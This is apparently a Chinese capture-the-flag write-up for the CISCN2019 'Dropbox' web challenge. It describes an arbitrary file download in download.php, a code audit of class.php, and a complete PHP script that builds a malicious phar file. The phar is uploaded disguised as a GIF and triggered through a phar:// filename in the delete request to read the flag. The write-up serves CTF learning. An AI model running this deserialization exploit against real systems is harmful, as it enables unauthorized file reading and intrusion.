[CISCN2019 华北赛区 Day1 Web1]Dropbox

开启靶场环境

是一个登陆界面

我们先去注册，然后进行登陆 test/test

界面有上传文件的功能，先上传一张jpg

可以看到有下载和删除的选项

猜测下载这里有任意文件下载

使用burpsuite抓包看下载的时候跳转到了哪个界面，发现是download.php

同时确实有任意文件下载

我们到download.php页面使用hackbar直接进行下载，防止乱码

最后下载的文件有class.php,delete.php,download.php,login.php,index.php,register.php

接下来就是代码审计了

看一下download.php

发现限制了下载文件的目录在/etc/tmp下，很常规的下载操作，下载的时候禁止下载文件名里面包含flag的文件

接着我们看delete.php的代码

看了之后好像也没有特别的地方，仅仅是返回一个删除文件是否成功的相应并输出该响应

再看一下class.php文件，代码有点多，我就直接放关键部分的截图吧（轻喷

User类里面有__construct()构造方法和__destruct()析构方法，当User对象被销毁的时候会执行db参数的close()方法

在FileList类的构造方法里面创建了File对象，在魔术方法__call里面，如果对应的方法在FilelIST类里面没有的话，就执行File对象的这个方法，同时将执行结果储存在results数组里面

当FileList对象被销毁的时候，则将results数组里面的内容全部输出出来

接着我们看File类

可以看出在这里对$filename进行了file_exists和is_dir的检查，这是两个人畜无害的函数，接着在File类的close方法里面，有file_get_contents函数读取文件

看到file_get_contents函数，我们就应该注意一下，因为这里是源代码里面唯一可以读取文件的地方，所以破题的地方很可能就是这里。

梳理一下思路，我们想要调用File类里面close()方法，恰好FileList类里面没有close方法，但是FileList类的__call魔术方法说的是如果没有这个方法，则调用new 的 File对象的这个方法，可以大胆地估计，这个要调用的方法，正是close方法。接着，在User类的析构方法中，会调用db参数的close方法，于是我们希望创建一个user对象，其中它的db变量正是一个FileList对象，对象中的文件名是我们猜测的flag所在的地方，/flag.txt或者/flag,这样，当user对象销毁的时候，就会调用db变量的close方法，但是FileList类里面没有close方法，于是转入__call魔术方法，执行File对象的close方法。通过简单的分析，close方法执行后存在results变量里面的结果会被加入到table变量中被打印出来，也就是最后会输出flag

所以现在问题变成了创建这样的一个User对象，这里需要借助phar伪协议。

关于phar伪协议的用法，这里贴两个链接

https://xz.aliyun.com/t/2715

https://paper.seebug.org/680/

Phar反序列化的利用条件为:

1.phar文件要能够上传到服务器端。
2.要有可用的魔术方法作为“跳板”。
3.文件操作函数的参数可控，且:、/、phar等特殊字符没有被过滤。

在这个环境中条件都满足，同时class.php中的delete函数使用了unlink函数

于是我们先构造这样的一个phar文件

贴上一位师傅的EXP

<?php
// add object of any class as meta data
	class User
	{
		public $db;
	}
	class FileList
	{
		private $files;
		public function __construct()
		{
			$this->files=array(new File());
		}
	}
	class File
	{
		public $filename='/flag.txt';
	}

	$b=new FileList();
	$c=new User();
	$c->db=$b;
    
 // create new Phar
    $phar = new Phar('test.phar');
    $phar->startBuffering();
    $phar->addFromString('test.txt', 'text');
    $phar->setStub('<?php __HALT_COMPILER(); ? >');
    $phar->setMetadata($c);
    $phar->stopBuffering();
 ?>

为了在本地生成phar文件，记得在php.ini配置文件里面修改

将其改为off

将生成的文件上传
bp抓包改类型为image/gif
之后删除
抓包修改为filename=phar://test.gif
flag在response里